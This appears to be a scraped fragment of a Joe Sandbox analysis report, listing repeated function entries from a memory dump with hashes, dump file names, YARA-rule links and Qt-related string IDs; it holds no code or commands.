                                                                                                                                                                                                                                          • Opcode ID: 1f8ce83451499f0ffc3761486204a908d098783c8365035e47748ddf552a1f25
                                                                                                                                                                                                                                          • Instruction ID: f6a7b974c5c6e69b296517e78c895a1ecce35f62f20d35917c04c83c9998d4c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f8ce83451499f0ffc3761486204a908d098783c8365035e47748ddf552a1f25
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E312A77A09A4682EB209B55E8496A973A5FF84FD0F858032DD8E07320EF7CF559C748
                                                                                                                                                                                                                                          Function 00007FF89D9ABAA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?tabletEvent@Event@@@TabletWindow@@
                                                                                                                                                                                                                                          • String ID: BJ8$QRasterWindow$focusOutEvent$focusOutEvent(self, a0: Optional[QFocusEvent])
                                                                                                                                                                                                                                          • API String ID: 2314446140-926177790
                                                                                                                                                                                                                                          • Opcode ID: a2991f8b9c74b687d925db61d083c52197152c58d32ef4b3be45d8c83a80b73b
                                                                                                                                                                                                                                          • Instruction ID: aa987b06e3f9e2d5477676f7cc7c6bbaec99882d056dccdf55f6b1577f444e02
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2991f8b9c74b687d925db61d083c52197152c58d32ef4b3be45d8c83a80b73b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C21FC33A09B46D6EA608B15E44526A73E4FB84FD4F544132EACE43768EF3CE555C704
                                                                                                                                                                                                                                          Function 00007FF89D9B7EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QRegExpValidator$childEvent$childEvent(self, a0: Optional[QChildEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-4000051574
                                                                                                                                                                                                                                          • Opcode ID: 690ec265b6efc938f5b8feb84294346ddf968f43f7c6cbfd03b09380635ed334
                                                                                                                                                                                                                                          • Instruction ID: 6de96c6fd777b310c44c3401c1c3986e47256f3030923dfb317a2ebe28faaec7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 690ec265b6efc938f5b8feb84294346ddf968f43f7c6cbfd03b09380635ed334
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8221F936A09B4686EA208B15E44426A77A4FB84FC4F444132EACE43B24EF3CE159D748
                                                                                                                                                                                                                                          Function 00007FF89D9AFE30 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?tabletEvent@Event@@@TabletWindow@@
                                                                                                                                                                                                                                          • String ID: BJ8$QRasterWindow$tabletEvent$tabletEvent(self, a0: Optional[QTabletEvent])
                                                                                                                                                                                                                                          • API String ID: 2314446140-3256538024
                                                                                                                                                                                                                                          • Opcode ID: 8d59cdecc881d435a600cb17361f81c29af7c588dad955e95a09e630c7e9e157
                                                                                                                                                                                                                                          • Instruction ID: c71973c5c634f944489a677700e5a28e11511e65423e8c1db2e82c93cde78174
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d59cdecc881d435a600cb17361f81c29af7c588dad955e95a09e630c7e9e157
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0221E633A09B46C6EA608B15E8852AA73E4FB85FC4F544132EACE43B64EF3CE555C744
                                                                                                                                                                                                                                          Function 00007FF89D9A9E30 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ9$QRasterWindow$connectNotify$connectNotify(self, signal: QMetaMethod)
                                                                                                                                                                                                                                          • API String ID: 59943102-1847739875
                                                                                                                                                                                                                                          • Opcode ID: 05a6abb1eb9007331ad248fc6ad10afcfe9159260899fde6fff16b8136b99afb
                                                                                                                                                                                                                                          • Instruction ID: e58512cac5728bb8da6dc9d75710d55f4a18848bc65897bd212823f7a0a208e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05a6abb1eb9007331ad248fc6ad10afcfe9159260899fde6fff16b8136b99afb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD211733A09B4696EA208F15E88526A73E4FB84FC4F544132EACE03B68EF3CE555C704
                                                                                                                                                                                                                                          Function 00007FF89D981E00 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QPdfWriter$customEvent$customEvent(self, a0: Optional[QEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-112237231
                                                                                                                                                                                                                                          • Opcode ID: 5e1ab9587a3f653f073a46ae3f6b0bdc76e11d69d94fc625d06f9e6932ae757f
                                                                                                                                                                                                                                          • Instruction ID: 824750cb158a60c96e9c0fd170b7328d4e06b3299063d2030e63c1333b5bad21
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e1ab9587a3f653f073a46ae3f6b0bdc76e11d69d94fc625d06f9e6932ae757f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8211773A09B46C2EA608B15E88426A73E4FB94FC8F444132EACE43724EF3CE155C744
                                                                                                                                                                                                                                          Function 00007FF89D959E40 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QWindow$timerEvent$timerEvent(self, a0: Optional[QTimerEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-4109671800
                                                                                                                                                                                                                                          • Opcode ID: 2049124feb9194ca323d961ce2ca93417cad1bac27ae7bdd43e910afe8e82484
                                                                                                                                                                                                                                          • Instruction ID: af08592fb4bceb2369b981b7ca057da38f1b05824ca4e6c748f32a76ac7baaec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2049124feb9194ca323d961ce2ca93417cad1bac27ae7bdd43e910afe8e82484
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C21E833A09B46D6EA608B15E88526A73E4FB84FC4F444132EACE43764EF3CE559C744
                                                                                                                                                                                                                                          Function 00007FF89D945DF0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QValidator$childEvent$childEvent(self, a0: Optional[QChildEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-16578966
                                                                                                                                                                                                                                          • Opcode ID: 93977c32554485b3583ec0930b101785e1ae5a316d42d7155b8d89a905d0c767
                                                                                                                                                                                                                                          • Instruction ID: 999fe09ad068edd37c03a0215bd288ec0ce9efb592506cc33fa35b7f19546d26
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93977c32554485b3583ec0930b101785e1ae5a316d42d7155b8d89a905d0c767
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69210833A09A46D6EA608B15E44426A73E4FB94FC4F444132EACE47778EF3CE155C704
                                                                                                                                                                                                                                          Function 00007FF89D9B9D20 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
